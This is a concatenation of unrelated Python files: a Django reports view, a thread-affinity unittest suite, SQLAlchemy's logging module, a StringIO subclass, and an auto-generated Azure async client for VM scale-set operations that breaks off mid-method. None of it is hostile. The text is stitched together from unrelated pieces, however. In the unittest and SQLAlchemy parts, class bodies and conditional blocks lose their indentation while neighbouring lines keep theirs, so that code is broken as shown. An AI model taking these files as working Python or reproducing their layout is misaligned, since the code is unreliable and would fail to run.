"""Reports views"""
# Django
from django.views.generic import TemplateView
# Shortcuts
from django.shortcuts import render
from django.shortcuts import redirect, reverse, get_object_or_404
from django.contrib.auth import authenticate
from django.http import (
HttpResponse,
HttpResponseNotFound,
HttpResponseServerError,
HttpResponseRedirect,
)
# Rest framework
from rest_framework.views import APIView
from rest_framework import status
from rest_framework.permissions import (
IsAuthenticated,
IsAdminUser,
)
from rest_framework.authentication import SessionAuthentication, BasicAuthentication
# Menus
from ...incubator.helpers.helperDictionaries import getReportsIndexMenus, getReportIndexAnalytics
class ReportsIndex(TemplateView):
    template_name = 'gepiandashboard/pages/reports_index.html'

    def get(self, request):
        if not request.user.is_authenticated:
            return render(request, 'errors/401.html', status=401)
        # Build the context per request: a class-level dict would be shared
        # (and mutated) across all requests served by this view.
        context = {
            'menus': getReportsIndexMenus(),
            'analytics': getReportIndexAnalytics(),
        }
        return render(request, self.template_name, context)
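
# Hypothetical URL wiring for this view (illustrative only; the project's
# actual urls.py may differ):
#
#     from django.urls import path
#     from .views import ReportsIndex
#
#     urlpatterns = [
#         path('reports/', ReportsIndex.as_view(), name='reports_index'),
#     ]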
|
import unittest
import random
import subprocess
import signal
import sys
import thread_affinity
# Test results may vary across systems with different numbers of CPUs.
def get_random_mask():
    """Return a random, valid affinity mask: a non-empty subset of
    {0, 1, ..., num_procs - 1}, expressed as a list of CPU indices.
    """
    num_procs = thread_affinity.get_nprocs()
    # The upper bound is 2 ** num_procs - 1, so at least one bit in the
    # valid range is always set and no out-of-range bit can appear.
    r = random.randint(1, 2 ** num_procs - 1)
    return [i for i in range(num_procs) if r & (1 << i)]
class TestThreadAffinityLibrary(unittest.TestCase):
"""Test basic Thread Affinity features.
"""
def test_set_get_affinity(self):
"""Test if a simple set & get works
"""
random.seed(1)
proc_list = get_random_mask()
        thread_affinity.set_affinity(proc_list)
self.assertEqual(proc_list, thread_affinity.get_affinity())
def test_set_get_incorrect_affinity(self):
"""Test if the program sets the default affinity in case of illegal masks
"""
illegal_mask = [-1]
default_affinity = thread_affinity.get_default_affinity()
        thread_affinity.set_affinity(illegal_mask)
self.assertEqual(default_affinity, thread_affinity.get_affinity())
def test_set_get_affinity_subprocess(self):
"""Test if the affinity of a subprocess can be controlled from above
"""
random.seed(3)
proc_list = get_random_mask()
        proc = subprocess.Popen([sys.executable, "-c", "while True: pass"])
thread_affinity.set_affinity(proc_list, proc.pid)
self.assertEqual(proc_list, thread_affinity.get_affinity(proc.pid))
        proc.send_signal(signal.SIGKILL)
        proc.wait()  # reap the child so it does not linger as a zombie
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(TestThreadAffinityLibrary)
    unittest.TextTestRunner(verbosity=2).run(suite)
|
# sqlalchemy/log.py
# Copyright (C) 2006-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
# Includes alterations by Vinay Sajip vinay_sajip@yahoo.co.uk
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
"""Logging control and utilities.
Control of logging for SA can be performed from the regular python logging
module. The regular dotted module namespace is used, starting at
'sqlalchemy'. For class-level logging, the class name is appended.
The "echo" keyword parameter, available on SQLA :class:`_engine.Engine`
and :class:`_pool.Pool` objects, corresponds to a logger specific to that
instance only.
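For example, to turn on INFO-level logging for all engines (an
illustrative snippet using the standard library ``logging`` module)::

    import logging

    logging.basicConfig()
    logging.getLogger("sqlalchemy.engine").setLevel(logging.INFO)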
"""
from __future__ import annotations
import logging
import sys
from typing import Any
from typing import Optional
from typing import overload
from typing import Set
from typing import Type
from typing import TypeVar
from typing import Union
from .util import py311
from .util import py38
from .util.typing import Literal
if py38:
STACKLEVEL = True
# needed as of py3.11.0b1
# #8019
STACKLEVEL_OFFSET = 2 if py311 else 1
else:
STACKLEVEL = False
STACKLEVEL_OFFSET = 0
_IT = TypeVar("_IT", bound="Identified")
_EchoFlagType = Union[None, bool, Literal["debug"]]
# Set the initial level to WARN. This is so that log statements
# don't occur in the absence of explicit logging configuration
# for 'sqlalchemy'.
rootlogger = logging.getLogger("sqlalchemy")
if rootlogger.level == logging.NOTSET:
rootlogger.setLevel(logging.WARN)
def _add_default_handler(logger: logging.Logger) -> None:
handler = logging.StreamHandler(sys.stdout)
handler.setFormatter(
logging.Formatter("%(asctime)s %(levelname)s %(name)s %(message)s")
)
logger.addHandler(handler)
_logged_classes: Set[Type["Identified"]] = set()
def _qual_logger_name_for_cls(cls: Type["Identified"]) -> str:
return (
getattr(cls, "_sqla_logger_namespace", None)
or cls.__module__ + "." + cls.__name__
)
def class_logger(cls: Type[_IT]) -> Type[_IT]:
logger = logging.getLogger(_qual_logger_name_for_cls(cls))
cls._should_log_debug = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.DEBUG
)
cls._should_log_info = lambda self: logger.isEnabledFor( # type: ignore[assignment] # noqa: E501
logging.INFO
)
cls.logger = logger
_logged_classes.add(cls)
return cls
_IdentifiedLoggerType = Union[logging.Logger, "InstanceLogger"]
class Identified:
__slots__ = ()
logging_name: Optional[str] = None
logger: _IdentifiedLoggerType
_echo: _EchoFlagType
def _should_log_debug(self) -> bool:
return self.logger.isEnabledFor(logging.DEBUG)
def _should_log_info(self) -> bool:
return self.logger.isEnabledFor(logging.INFO)
class InstanceLogger:
"""A logger adapter (wrapper) for :class:`.Identified` subclasses.
This allows multiple instances (e.g. Engine or Pool instances)
to share a logger, but have its verbosity controlled on a
per-instance basis.
The basic functionality is to return a logging level
which is based on an instance's echo setting.
Default implementation is:
'debug' -> logging.DEBUG
True -> logging.INFO
False -> Effective level of underlying logger (
logging.WARNING by default)
None -> same as False
"""
# Map echo settings to logger levels
_echo_map = {
None: logging.NOTSET,
False: logging.NOTSET,
True: logging.INFO,
"debug": logging.DEBUG,
}
_echo: _EchoFlagType
__slots__ = ("echo", "logger")
def __init__(self, echo: _EchoFlagType, name: str):
self.echo = echo
self.logger = logging.getLogger(name)
# if echo flag is enabled and no handlers,
# add a handler to the list
if self._echo_map[echo] <= logging.INFO and not self.logger.handlers:
_add_default_handler(self.logger)
#
# Boilerplate convenience methods
#
def debug(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a debug call to the underlying logger."""
self.log(logging.DEBUG, msg, *args, **kwargs)
def info(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an info call to the underlying logger."""
self.log(logging.INFO, msg, *args, **kwargs)
def warning(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a warning call to the underlying logger."""
self.log(logging.WARNING, msg, *args, **kwargs)
warn = warning
def error(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""
Delegate an error call to the underlying logger.
"""
self.log(logging.ERROR, msg, *args, **kwargs)
def exception(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate an exception call to the underlying logger."""
kwargs["exc_info"] = 1
self.log(logging.ERROR, msg, *args, **kwargs)
def critical(self, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a critical call to the underlying logger."""
self.log(logging.CRITICAL, msg, *args, **kwargs)
def log(self, level: int, msg: str, *args: Any, **kwargs: Any) -> None:
"""Delegate a log call to the underlying logger.
The level here is determined by the echo
flag as well as that of the underlying logger, and
logger._log() is called directly.
"""
# inline the logic from isEnabledFor(),
# getEffectiveLevel(), to avoid overhead.
if self.logger.manager.disable >= level:
return
selected_level = self._echo_map[self.echo]
if selected_level == logging.NOTSET:
selected_level = self.logger.getEffectiveLevel()
if level >= selected_level:
if STACKLEVEL:
kwargs["stacklevel"] = (
kwargs.get("stacklevel", 1) + STACKLEVEL_OFFSET
)
self.logger._log(level, msg, args, **kwargs)
def isEnabledFor(self, level: int) -> bool:
"""Is this logger enabled for level 'level'?"""
if self.logger.manager.disable >= level:
return False
return level >= self.getEffectiveLevel()
def getEffectiveLevel(self) -> int:
"""What's the effective level for this logger?"""
level = self._echo_map[self.echo]
if level == logging.NOTSET:
level = self.logger.getEffectiveLevel()
return level
def instance_logger(
instance: Identified, echoflag: _EchoFlagType = None
) -> None:
"""create a logger for an instance that implements :class:`.Identified`."""
if instance.logging_name:
name = "%s.%s" % (
_qual_logger_name_for_cls(instance.__class__),
instance.logging_name,
)
else:
name = _qual_logger_name_for_cls(instance.__class__)
instance._echo = echoflag # type: ignore
logger: Union[logging.Logger, InstanceLogger]
if echoflag in (False, None):
# if no echo setting or False, return a Logger directly,
# avoiding overhead of filtering
logger = logging.getLogger(name)
else:
# if a specified echo flag, return an EchoLogger,
# which checks the flag, overrides normal log
# levels by calling logger._log()
logger = InstanceLogger(echoflag, name)
instance.logger = logger # type: ignore
class echo_property:
__doc__ = """\
When ``True``, enable log output for this element.
This has the effect of setting the Python logging level for the namespace
of this element's class and object reference. A value of boolean ``True``
indicates that the loglevel ``logging.INFO`` will be set for the logger,
whereas the string value ``debug`` will set the loglevel to
``logging.DEBUG``.
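
    For example, to switch to debug-level output at runtime (an
    illustrative assignment on a hypothetical ``some_engine``)::

        some_engine.echo = "debug"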
"""
@overload
def __get__(
self, instance: Literal[None], owner: Type[Identified]
) -> echo_property:
...
@overload
def __get__(
self, instance: Identified, owner: Type[Identified]
) -> _EchoFlagType:
...
def __get__(
self, instance: Optional[Identified], owner: Type[Identified]
) -> Union[echo_property, _EchoFlagType]:
if instance is None:
return self
else:
return instance._echo
def __set__(self, instance: Identified, value: _EchoFlagType) -> None:
instance_logger(instance, echoflag=value)
|
"""
Stream IO interposition
"""
import io
class InterposedStringIO(io.StringIO):
    def __init__(self, newline="\n", line_buffering=False, onflush=None):
super().__init__(newline=newline)
self._line_buffering = line_buffering
self._onflush = onflush
    def flush(self):
        s = self.getvalue()
        # Rewind to the start and clear the buffer before handing the
        # accumulated text to the callback. Note the argument order:
        # seek(position, whence), not the other way around.
        self.seek(0, io.SEEK_SET)
        self.truncate()
        if self._onflush:
            self._onflush(s)

    def write(self, s):
        count = super().write(s)
        if self._line_buffering and ('\n' in s or '\r' in s):
            self.flush()
        return count
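
# A minimal usage sketch (illustrative): with line buffering enabled, each
# newline-terminated write is delivered to the ``onflush`` callback and the
# buffer is cleared, which is handy for mirroring or capturing stream output.
if __name__ == "__main__":
    chunks = []
    stream = InterposedStringIO(line_buffering=True, onflush=chunks.append)
    stream.write("hello\n")   # triggers an automatic flush
    stream.write("world")     # buffered until an explicit flush
    stream.flush()
    print(chunks)  # ['hello\n', 'world']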
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import functools
from typing import Any, AsyncIterable, Callable, Dict, Generic, Optional, TypeVar, Union
import warnings
from azure.core.async_paging import AsyncItemPaged, AsyncList
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import AsyncHttpResponse
from azure.core.polling import AsyncLROPoller, AsyncNoPolling, AsyncPollingMethod
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.decorator_async import distributed_trace_async
from azure.mgmt.core.exceptions import ARMErrorFormat
from azure.mgmt.core.polling.async_arm_polling import AsyncARMPolling
from ... import models as _models
from ..._vendor import _convert_request
from ...operations._virtual_machine_scale_set_vms_operations import build_deallocate_request_initial, build_delete_request_initial, build_get_instance_view_request, build_get_request, build_list_request, build_power_off_request_initial, build_reimage_all_request_initial, build_reimage_request_initial, build_restart_request_initial, build_start_request_initial
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]]
class VirtualMachineScaleSetVMsOperations:
"""VirtualMachineScaleSetVMsOperations async operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.compute.v2017_03_30.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer) -> None:
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
async def _reimage_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
@distributed_trace_async
async def begin_reimage(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Reimages (upgrade the operating system) a specific virtual machine in a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimage'} # type: ignore
async def _reimage_all_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_reimage_all_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._reimage_all_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_reimage_all_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
@distributed_trace_async
async def begin_reimage_all(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Allows you to re-image all the disks ( including data disks ) in the a VM scale set instance.
This operation is only supported for managed disks.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._reimage_all_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_reimage_all.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/reimageall'} # type: ignore
async def _deallocate_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_deallocate_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._deallocate_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_deallocate_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
@distributed_trace_async
async def begin_deallocate(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deallocates a specific virtual machine in a VM scale set. Shuts down the virtual machine and
releases the compute resources it uses. You are not billed for the compute resources of this
virtual machine once it is deallocated.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._deallocate_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, lro_options={'final-state-via': 'azure-async-operation'}, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_deallocate.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}/deallocate'} # type: ignore
async def _delete_initial(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> Optional["_models.OperationStatusResponse"]:
cls = kwargs.pop('cls', None) # type: ClsType[Optional["_models.OperationStatusResponse"]]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_delete_request_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self._delete_initial.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200, 202, 204]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
_delete_initial.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def begin_delete(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> AsyncLROPoller["_models.OperationStatusResponse"]:
"""Deletes a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:keyword str continuation_token: A continuation token to restart a poller from a saved state.
:keyword polling: By default, your polling method will be AsyncARMPolling. Pass in False for
this operation to not poll, or pass in your own initialized polling object for a personal
polling strategy.
:paramtype polling: bool or ~azure.core.polling.AsyncPollingMethod
:keyword int polling_interval: Default waiting time between two polls for LRO operations if no
Retry-After header is present.
:return: An instance of AsyncLROPoller that returns either OperationStatusResponse or the
result of cls(response)
:rtype:
~azure.core.polling.AsyncLROPoller[~azure.mgmt.compute.v2017_03_30.models.OperationStatusResponse]
:raises: ~azure.core.exceptions.HttpResponseError
"""
polling = kwargs.pop('polling', True) # type: Union[bool, azure.core.polling.AsyncPollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationStatusResponse"]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = await self._delete_initial(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
def get_long_running_output(pipeline_response):
response = pipeline_response.http_response
deserialized = self._deserialize('OperationStatusResponse', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
if polling is True: polling_method = AsyncARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = AsyncNoPolling()
else: polling_method = polling
if cont_token:
return AsyncLROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return AsyncLROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVM":
"""Gets a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVM, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVM
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVM"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachineScaleSetVM', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Compute/virtualMachineScaleSets/{vmScaleSetName}/virtualmachines/{instanceId}'} # type: ignore
@distributed_trace_async
async def get_instance_view(
self,
resource_group_name: str,
vm_scale_set_name: str,
instance_id: str,
**kwargs: Any
) -> "_models.VirtualMachineScaleSetVMInstanceView":
"""Gets the status of a virtual machine from a VM scale set.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param vm_scale_set_name: The name of the VM scale set.
:type vm_scale_set_name: str
:param instance_id: The instance ID of the virtual machine.
:type instance_id: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachineScaleSetVMInstanceView, or the result of cls(response)
:rtype: ~azure.mgmt.compute.v2017_03_30.models.VirtualMachineScaleSetVMInstanceView
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.VirtualMachineScaleSetVMInstanceView"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
request = build_get_instance_view_request(
resource_group_name=resource_group_name,
vm_scale_set_name=vm_scale_set_name,
instance_id=instance_id,
subscription_id=self._config.subscription_id,
template_url=self.get_instance_view.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
pipeline_response = await self._client._pipeline.run(request, stream=False, **kwargs)
